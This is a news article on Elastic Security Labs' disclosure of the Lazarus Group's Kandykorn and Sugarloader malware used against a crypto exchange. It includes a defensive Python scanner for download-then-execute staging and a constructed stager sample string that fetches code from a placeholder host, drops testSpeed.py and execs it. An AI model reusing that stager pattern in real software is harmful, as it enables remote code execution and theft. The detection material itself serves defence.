Lazarus Group deploys ‘Kandykorn’ malware on an exchange

Elastic Security Labs recently disclosed a significant cybersecurity development: the Lazarus Group’s attempt to breach a cryptocurrency exchange using a novel form of malware known as “Kandykorn.” Accompanying this malware was its loader program, “Sugarloader,” recognized by its distinctive “.sld” extension. While the specific exchange targeted was not disclosed, the methodology employed by the Lazarus Group raises substantial concerns.

Elastic Security Labs unveils Lazarus Group’s activities

In 2023, a surge in private-key hacks at crypto exchanges has been observed, mostly attributed to the North Korean cybercrime group Lazarus Group. The Lazarus Group’s modus operandi in this attack involved masquerading as blockchain engineers and engaging, via Discord, with engineers associated with the unnamed crypto exchange. Posing as collaborators, they offered an arbitrage bot that purportedly could exploit cryptocurrency price differences across various exchanges.


By disguising the files within the program’s ZIP folder as “config.py” and “pricetable.py,” resembling an arbitrage bot, they successfully convinced the engineers to download what seemed to be a beneficial “bot.” Upon execution, the program initiated a “Main.py” file, which included both harmless programs and a malicious component, “Watcher.py.” Watcher.py established a connection with a remote Google Drive account, downloading content to a file named “testSpeed.py.”

After a one-time execution, testSpeed.py downloaded additional content and executed a file called “Sugarloader.” The malevolent Sugarloader file was concealed using a “binary packer,” enabling it to evade most malware detection systems. Elastic identified it by interrupting the program after the initialization functions had commenced and snapshotting the process’s virtual memory. Despite being labeled as non-malicious by VirusTotal malware detection, Sugarloader managed to download Kandykorn onto the system upon connecting to a remote server.
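The staging chain described above (a script inside an apparently benign project that fetches content from a remote host, writes it to a new .py file and executes it) is a pattern a defender can look for statically before a package is ever run. The following scanner is an added example written for this article; it is not Elastic’s tooling or anything recovered from the incident. It parses Python source with the standard `ast` module and flags files that combine a network import with `exec`/`eval`/`subprocess`-style execution or with writing a `.py` file. The sample stager and the benign file embedded at the bottom are constructed for the demonstration, and the `.invalid` hostname is a placeholder, not an indicator from the report.

```python
"""Heuristic download-then-execute scanner for Python source (added example).

Flags files that (a) import a network-capable module and (b) either execute
dynamic code or write a new .py file, the combination used by a stager.
Assumptions: a heuristic, not a signature; it will miss obfuscated code and
may flag legitimate installers, so treat hits as review candidates.
"""
import ast
import sys

# Top-level packages that give a script the ability to fetch remote content.
NETWORK_ROOTS = {"urllib", "requests", "http", "googleapiclient", "socket", "ftplib"}
# Builtins that turn data into running code.
EXEC_BUILTINS = {"exec", "eval", "compile"}
# (module, function) pairs that spawn external programs.
EXEC_ATTR_CALLS = {
    ("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
    ("os", "system"), ("os", "popen"), ("os", "execv"), ("os", "execvp"),
}


def _call_target(node):
    """Return (module, name) for mod.name(...) or (None, name) for name(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return (None, func.id)
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return (None, None)


def analyze_source(src, filename="<constructed>"):
    """Analyze one Python source string; returns a findings dict."""
    tree = ast.parse(src, filename=filename)
    findings = {"network_imports": set(), "exec_calls": [], "writes_py_file": []}

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_ROOTS:
                    findings["network_imports"].add(alias.name)
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in NETWORK_ROOTS:
                findings["network_imports"].add(node.module)
        elif isinstance(node, ast.Call):
            mod, name = _call_target(node)
            if mod is None and name in EXEC_BUILTINS:
                findings["exec_calls"].append((name, node.lineno))
            elif (mod, name) in EXEC_ATTR_CALLS:
                findings["exec_calls"].append((f"{mod}.{name}", node.lineno))
            elif mod is None and name == "open" and node.args:
                # open("<literal>.py", "w"/"a"): a script that drops another script.
                target = node.args[0]
                mode = node.args[1].value if (len(node.args) > 1
                                               and isinstance(node.args[1], ast.Constant)) else "r"
                if (isinstance(target, ast.Constant) and isinstance(target.value, str)
                        and target.value.endswith(".py") and any(c in str(mode) for c in "wa")):
                    findings["writes_py_file"].append((target.value, node.lineno))

    # Network capability AND a way to run what was fetched: the staging pattern.
    findings["suspicious"] = bool(findings["network_imports"]) and bool(
        findings["exec_calls"] or findings["writes_py_file"])
    return findings


def scan_file(path):
    """Convenience wrapper for scanning a file on disk."""
    with open(path, encoding="utf-8") as fh:
        return analyze_source(fh.read(), filename=path)


# Constructed sample: a minimal stager shaped like the chain described above.
STAGER_SAMPLE = '''
import urllib.request
def update():
    data = urllib.request.urlopen("https://drive.example.invalid/payload").read()
    with open("testSpeed.py", "w") as f:
        f.write(data.decode())
    exec(data)
'''

# Constructed sample: a harmless helper such as a price-table loader.
BENIGN_SAMPLE = '''
import json
def load_prices(path):
    with open(path) as f:
        return json.load(f)
'''

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for p in targets:
            print(p, scan_file(p))
    else:
        print("stager:", analyze_source(STAGER_SAMPLE))
        print("benign:", analyze_source(BENIGN_SAMPLE))
```

Run it with no arguments to see the two embedded samples classified, or pass paths to scan a downloaded project (for example every `.py` in an unpacked ZIP) before executing anything from it. The heuristic deliberately requires both capabilities in one file; a downloader alone or an `exec` alone is common in legitimate code, and it is the combination that matches the Watcher.py-to-testSpeed.py handoff.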

Rising cybersecurity challenges in the crypto sector in 2023

Kandykorn, residing in the device’s memory, boasts various functionalities that empower the remote server to execute malicious activities. For instance, commands like “0xD3” could list the contents of a victim’s computer directory, and “resp_file_down” could transfer the victim’s files to the attacker’s system. Elastic suggested that the attack likely transpired in April 2023, signifying an ongoing threat with continuous development of tools and techniques for malicious intents.

This development aligns with the prevailing trend observed in 2023, where centralized crypto exchanges and apps encountered multiple attacks. Alphapo, CoinsPaid, Atomic Wallet, Coinex, and Stake were among the targets, with attacks involving the theft of private keys from victims’ devices, enabling the transfer of customers’ cryptocurrency to the attackers’ addresses. Authorities, including the United States Federal Bureau of Investigation, linked several of these attacks to the Lazarus Group.

Incidents such as the Coinex hack and the Stake attack were associated with this cybercrime entity. The emergence of Kandykorn and its associated loader, Sugarloader, within the context of the Lazarus Group’s activities poses a considerable security concern within the cryptocurrency sphere. The persistent nature of these threats necessitates increased vigilance and continuous improvements in security measures to counter such malevolent activities.
